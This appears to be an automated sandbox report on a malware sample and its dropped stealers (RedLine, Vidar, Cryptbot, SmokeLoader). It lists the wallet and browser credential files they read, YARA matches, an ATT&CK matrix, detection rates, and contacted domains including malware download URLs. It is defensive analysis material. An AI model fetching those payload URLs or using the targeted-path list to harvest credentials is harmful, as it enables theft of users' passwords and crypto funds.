\files_\cryptocurrency\Nifty \files_\cryptocurrency\Math \files_\cryptocurrency\Coinbase \files_\cryptocurrency\BinanceChain \files_\cryptocurrency\Brave \files_\cryptocurrency\Guarda \files_\cryptocurrency\Equal \files_\cryptocurrency\JaxxxLiberty \files_\cryptocurrency\BitApp \files_\cryptocurrency\iWallet \files_\cryptocurrency\Wombat \files_\cryptocurrency\Atomic \files_\cryptocurrency\MewCx \files_\cryptocurrency\Guild \files_\cryptocurrency\Saturn \files_\cryptocurrency\TerraStation \files_\cryptocurrency\Harmony \files_\cryptocurrency\Coin98 \files_\cryptocurrency\TON Crystall \files_\cryptocurrency\KardiaChain %ProgramData%\AVG%ProgramData%\AVAST SoftwareHARDWARE\DESCRIPTION\System\CentralProcessor\0P
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: .m1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: .m-cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: 12F1.exe, 00000009.00000002.978458353.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: .m5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 12F1.exe, 00000009.00000002.948865342.0000000000CE2000.00000040.00020000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\305.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\305.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\305.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\305.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Source: Yara match	File source: 00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 12F1.exe PID: 6580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 305.exe PID: 1380, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 20.0.1EAA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.1EAA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.1EAA.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.45835c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.12F1.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.44e5e88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.45835c0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.1EAA.exe.44e5e88.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.948865342.0000000000CE2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.830171711.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.820409193.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.829040256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.938711812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.832066411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 12F1.exe PID: 6580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1EAA.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1EAA.exe PID: 2740, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Cryptbot

Show sources

Source: Yara match	File source: 00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 305.exe PID: 1380, type: MEMORYSTR

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 0000000C.00000002.814172336.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.736880382.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.737014881.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.854879480.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.853177748.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.815844712.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.724058055.0000000004F41000.00000020.00020000.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: 00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	Input Capture1	File and Directory Discovery3	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Process Injection513	Obfuscated Files or Information4	Security Account Manager	System Information Discovery266	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter2	Logon Script (Mac)	Logon Script (Mac)	Software Packing34	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Security Software Discovery10101	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol25	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Process Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Virtualization/Sandbox Evasion571	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading11	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion571	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection513	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
v72n86vFFq.exe	33%	Virustotal		Browse
v72n86vFFq.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\305.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\Users\user\AppData\Local\Temp\1EAA.exe	100%	Avira	HEUR/AGEN.1144480
C:\Users\user\AppData\Local\Temp\305.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1EAA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\361B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\51B3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\12F1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hiftsuu	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44A2.exe	100%	Joe Sandbox ML
C:\ProgramData\sqlite3.dll	3%	Metadefender		Browse
C:\ProgramData\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\12F1.exe	26%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\12F1.exe	57%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1EAA.exe	37%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1EAA.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\2340.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\305.exe	43%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\305.exe	86%	ReversingLabs	Win32.Trojan.SelfDel
C:\Users\user\AppData\Local\Temp\361B.exe	29%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\361B.exe	51%	ReversingLabs	Win32.Trojan.Lockbit

Unpacked PE Files

Source	Detection	Scanner	Label	Download
20.0.1EAA.exe.4c0000.11.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
14.2.1EAA.exe.410000.0.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
12.1.hiftsuu.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.12F1.exe.ce0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.v72n86vFFq.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.0.1EAA.exe.410000.1.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
31.2.2340.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
20.0.1EAA.exe.4c0000.7.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
0.2.v72n86vFFq.exe.5b15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.0.1EAA.exe.4c0000.3.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
10.0.1EAA.exe.e80000.1.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
17.2.44A2.exe.4e0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
13.0.361B.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.3.12F1.exe.2910000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.0.v72n86vFFq.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1126869	Download File
20.0.1EAA.exe.4c0000.1.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
22.0.305.exe.1290000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
22.0.305.exe.1290000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
13.0.361B.exe.2df0e50.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.v72n86vFFq.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1126869	Download File
14.0.1EAA.exe.410000.3.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
4.0.v72n86vFFq.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.3.361B.exe.2e00000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.0.1EAA.exe.410000.0.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
20.0.1EAA.exe.4c0000.5.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
10.0.1EAA.exe.e80000.3.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
31.0.2340.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
9.1.12F1.exe.ce0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.0.2340.exe.400000.12.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
31.0.2340.exe.400000.16.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
20.0.1EAA.exe.4c0000.0.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
9.0.12F1.exe.ce0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.1EAA.exe.e80000.0.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
23.1.51B3.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
23.0.51B3.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.1EAA.exe.e80000.0.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
23.2.51B3.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.0.2340.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
17.2.44A2.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1123417	Download File
22.2.305.exe.1290000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
22.0.305.exe.1290000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
14.0.1EAA.exe.410000.2.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
20.0.1EAA.exe.4c0000.2.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
23.0.51B3.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.0.2340.exe.400000.14.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
13.1.361B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.0.1EAA.exe.4c0000.9.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
12.2.hiftsuu.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
23.0.51B3.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.v72n86vFFq.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1126869	Download File
4.0.v72n86vFFq.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1126869	Download File
20.0.1EAA.exe.4c0000.13.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
13.2.361B.exe.2df0e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.361B.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.2.51B3.exe.5b15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.hiftsuu.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.hiftsuu.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.361B.exe.2df0e50.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.hiftsuu.4e15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.0.2340.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
13.2.361B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
31.0.2340.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
9.0.12F1.exe.ce0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.1EAA.exe.e80000.2.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
22.0.305.exe.1290000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
4.0.v72n86vFFq.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.1EAA.exe.4c0000.1.unpack	100%	Avira	HEUR/AGEN.1144480	Download File
4.0.v72n86vFFq.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.hiftsuu.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.0.12F1.exe.ce0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.1.v72n86vFFq.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://host-file-host-3.com/files/8723_1638191106_2017.exe	3%	Virustotal		Browse
http://host-file-host-3.com/files/8723_1638191106_2017.exe	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publiczna	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://host-file-host-3.com/files/5311_1638303032_7343.exe	0%	Virustotal		Browse
http://host-file-host-3.com/files/5311_1638303032_7343.exe	100%	Avira URL Cloud	malware
http://host-file-host-3.com/files/6096_1638289274_6885.exe	1%	Virustotal		Browse
http://host-file-host-3.com/files/6096_1638289274_6885.exe	100%	Avira URL Cloud	malware
https://api.ip.sb/ip	0%	URL Reputation	safe
https://socfinder.site/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://host-file-host-3.com/game.exe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://95.181.152.139	0%	Avira URL Cloud	safe
http://privacytoolzforyou-7000.com/downloads/toolspab3.exe	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
https://socfinder.site	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22ResponseP	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id19ResponseP	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22ResponseH	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id19ResponseH	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22Response	0%	URL Reputation	safe
http://file-file-host4.com/sqlite3.dll	0%	URL Reputation	safe
https://get.adob	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18Response	0%	URL Reputation	safe
https://cdn.discordapp.com4hl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
host-data-coin-11.com	95.213.165.249	true	false	high
privacytoolzforyou-7000.com	95.213.165.249	true	false	high
qo.ckauni.ru	81.177.141.85	true	false	high
cdn.discordapp.com	162.159.130.233	true	false	high
host-file-host-3.com	95.213.165.249	true	false	high
www.google.com	142.250.184.68	true	false	high
file-file-host4.com	95.213.165.249	true	false	high
unic7m.top	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-file-host-3.com/files/8723_1638191106_2017.exe	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://host-file-host-3.com/files/5311_1638303032_7343.exe	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://host-file-host-3.com/files/6096_1638289274_6885.exe	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/914960103592054858/914986994759794738/Underdosed.exe	false		high
http://host-file-host-3.com/game.exe	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/914960103592054858/914961866462232616/Oldening.exe	false		high
http://privacytoolzforyou-7000.com/downloads/toolspab3.exe	true	Avira URL Cloud: malware	unknown
http://file-file-host4.com/sqlite3.dll	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	12F1.exe, 00000009.00000002.980544860.000000000381F000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978366259.00000000035BF000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978236166.00000000035A9000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979046859.000000000375D000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.986155603.0000000003835000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.987830142.0000000004323000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.987221827.00000000042B2000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977009198.00000000034E7000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.988391512.00000000043D5000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.976120725.0000000003425000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.990329619.000000000478D000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972315396.0000000002B1D000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961521514.0000000002A5B000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.974497889.0000000002D14000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.975544789.00000000039B3000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.974600365.0000000002D2A000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp, 305.exe, 00000016.00000003.849942503.0000000000BB3000.00000004.00000001.sdmp, default_webdata.db.22.dr, default_webdata.db0.22.dr	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp, 305.exe, 00000016.00000003.849942503.0000000000BB3000.00000004.00000001.sdmp, default_webdata.db.22.dr, default_webdata.db0.22.dr	false		high
http://tempuri.org/Entity/Id12Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id21Response	12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_real	12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	false		high
